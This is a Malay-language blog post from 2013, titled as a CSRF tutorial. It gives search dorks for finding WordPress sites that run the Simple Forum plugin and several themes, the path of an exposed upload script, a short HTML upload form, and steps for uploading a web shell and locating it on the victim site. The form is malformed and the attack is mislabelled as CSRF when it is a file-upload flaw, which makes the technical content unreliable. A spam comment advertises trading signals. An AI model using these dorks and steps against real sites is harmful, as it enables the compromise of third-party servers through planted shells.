Saturday, 6 July 2013

CSRF Tutorial



Assalamualaikum , dah lame tak update .. yer ... ok ari ni saya nak kongsi ilmu baru

APAKAH ITU CSRF ?

CSRF ialah bermaksud Cross Site Request Forgery


dork : 
inurl:/plugins/simple-forum/
inurl:/wp-content/themes/shepard
inurl:/wp-content/themes/money
inurl:/wp-content/themes/clockstone
inurl:/wp-content/themes/ambleside
inurl:/wp-content/themes/pacifico

tambah

/resources/jscript/ajaxupload/sf-uploader.php

kt belakang contoh akan jadi cmni
www.site.com/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/sf-uploader.php

dia akan kuar tulisan = error

kalau kuar acces denied x boleh la 2

poc dia 
<form enctype="multipart/form-data" 
<input type="jpg" name="url" value="./" /><br />
Please choose a file: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
upload poc dia dalam mana web save as.html
lepas 2 tukar website yang ada tulisan error masuk kan dalam poc 2 bila bukak akan kuar form upload dan upload la shell
shell korang akan kuar kt sini
wp-content/plugins/simple-forum/resources/jscript/ajaxupload/namashell.php
ok Enjoy!!

1 Komen:

  1. QUANTUM BINARY SIGNALS

    Get professional trading signals sent to your mobile phone daily.

    Start following our signals right now and gain up to 270% a day.

    ReplyDelete